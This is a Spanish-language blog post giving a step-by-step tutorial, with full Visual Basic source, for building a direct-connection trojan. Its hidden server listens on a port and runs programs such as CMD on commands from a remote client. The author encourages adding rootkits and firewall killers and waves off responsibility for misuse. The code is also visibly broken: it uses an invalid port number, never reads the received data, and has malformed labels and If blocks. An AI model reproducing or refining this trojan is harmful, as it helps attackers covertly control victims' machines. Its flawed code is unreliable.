.CAPITULO 1 - UN REPASO:
En primer lugar tenes que saber lo que es el componente "Microsoft Winsock". Es un componente que le podes agregar a tu aplicación para que pueda realizar conexiones locales o remotas, es lo que vamos a usar para que al presionar un boton, se conecte a la IP de la maquina infectada, obviamente tiene que tener el servidor corriendo, el cual va a funcionar escuchando tal puerto. Si queres crear un troyano de conexión inversa es tu desición, en el texto esta explicado como hacer un de conexión directa, pero con la practica y el estudio vas a aprender como hacerlos de otras formas.
.CAPITULO 1- CLIENTE DEL TROYANO DE CONEXION DIRECTA:
Si queres hacer uno de conexión directa, tenes que hacerlo de tal manera en la que el servidor sea el que escuche un puerto, y el cliente se conecte a la IP de la PC infectada a travez de el. Eso es muy facil, tenes que agregar al formulario los siguientes componentes:
. 4 Botones (los cuales tengan los nombres; Conectar, Desconectar, CMD y Notas).
. 1 Microsoft Winsock Control 6.0 (tiene que llamarse "Winsock1", igual ya viene asi por defecto, en la siguiente imagen vas a ver como agregarlo desde los componentes).
. 1 Caja de texto llamada "IP".
Despues de haber agregado todo lo necesario, hay que poner un codigo parecido a este que se ve abajo (explicado para los no-ignorantes):
'Troyano creado por Echeniqueitor
Private Sub Form_Load() 'Este "Sub" tiene las sentencias que se van a ejecutar cuando se inicie el troyano
IP.Text = Winsock1.LocalIP 'Esto es para que la caja de texto de la IP escriba la IP local como ejemplo, para hacerlo tiene que pedirle ayuda al Winsock, como se puede ver en el codigo
End Sub
Private Sub Conectar_Click() 'Estas son las sentencias que se van a ejecutar cuando se presione el boton de conectar
Winsock1.Close 'Esto sirve para que el Winsock cierre cualquier conexión previa a la anterior
Winsock1.Connect IP.Text, 261194 'Esto se conecta a la IP escrita en la caja de texto desde el puerto 261194, el numero es la fecha de mi cumpleaños
Me.Caption = "Troyano de Echeniqueitor - Conectado!!" 'Esto cambia el titulo del formulario a "Troyano de Echeniqueitor - Conectado!!", en el caso de que se conecte
End Sub
Private Sub Notas_Click() 'Este es el boton "Notas", el cual envia al servidor la orden de ejecutar el Bloc de notas
Winsock1.SendData "Notas" 'En el servidor esta especificada la orden "Notas", eso lo vas a ver a la hora de crearlo
End Sub
Private Sub CMD_Click() 'Esto abre el MS-Dos
Winsock1.SendData "CMD" 'CMD es la orden que lo ejecuta
End Sub
Private Sub Desconectar_Click() 'Esto desconecta al cliente del servidor
Winsock1.Close 'Cierra la conexion
Me.Caption = "Troyano de Echeniqueitor - Desconectado" 'Cambia el titulo a "Troyano de Echeniqueitor - Desconectado"
End Sub
.CAPITULO 2 - SERVIDOR DEL TROYANO DE CONEXIÓN DIRECTA:
El servidor del troyano es muy facil de crear, aca voy a exponer un codigo basico, si queres le podes agregar tambien Rootkits y Firewall Killer (para los que saben). Abri un nuevo Form, agrega un Winsock llamado "Winsock1" y escribi el siguiente codigo (antes podes guardar el source o ejecutable del cliente)
Private Sub Form_Load() 'Lo que va a pasar cuando el formulario se inicie
On Error Resume Next 'Ante cualquier problema continua sin avisar el error
Winsock1.LocalPort 261194 'El Winsock indica que el puerto 261194 tiene que ser escuchado
Winsock1.Listen 'Esto abre e inicia la escucha el puerto colocado anteriormente
Me.Visible = False 'Esto hace que el servidor se ejecute en modo oculto
End Sub
Private Sub Winsock1_DataArrival() 'Esto hace que el Winsock realice sus conexiones y acciones
Dim Datos As String 'Esto es para que la palabra Datos sea una variable para identificar los datos que el cliente le envie al servidor
If Datos = "Notas" Then GoTo Notas 'Si los datos son "Notas" va hasta : Notas
: Notas 'En la siguiente linea es donde se ejecuta el Bloc de Notas
a = Shell("NOTEPAD.EXE", 1) 'La aplicación Shell ejecuta archivos EXE, en este caso el Bloc de Notas 1 vez
If Datos = "CMD" Then GoTo CMD
: CMD
a = Shell("CMD.EXE", 1) 'Esto ejecuta el MS-Dos igual que el bloc de notas
End If 'Fin de las condicionales "If"
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal RequestID As Long) 'Petición de la conexión
Winsock1.Close 'Cierra el Winsock
Winsock1.Accept RequestID 'Acepta la conexión
End Sub
No importa cual sea el titulo ni nada de eso, no tengas miedo al autoinfectarte porque no tiene nada malo, no se agrega al registro, no se copia y se puede ver el proceso.
No seas lammer, si queres hacer un troyano mejor que este, ponete a "estudiar" la programación en Visual Basic, si tomas este proyecto como gran cosa, es porque sos un N00B de primera (sin ofender) y si te crees hacker antes o después de saber esto, es porque sos otro l4m3r más que sobra en la Internet.
PD: No me hago responsable del mal uso de todo esto, el responsable sera el que lo use, no el que enseña. Ya que si pasa algo te voy a ignorar con las boludeces que escribas en los comentarios, anda a llorar a otro lado y aprende que el más poderoso e inteligente es quién sobrevive en esta eterna"guerra".
Atentamente: Echeniqueitor.
1 comentario:
che papa.. necesito tu ayuda.. te dejo mi corre kacha90@hotmail.com un abrazo ;) kapo
Publicar un comentario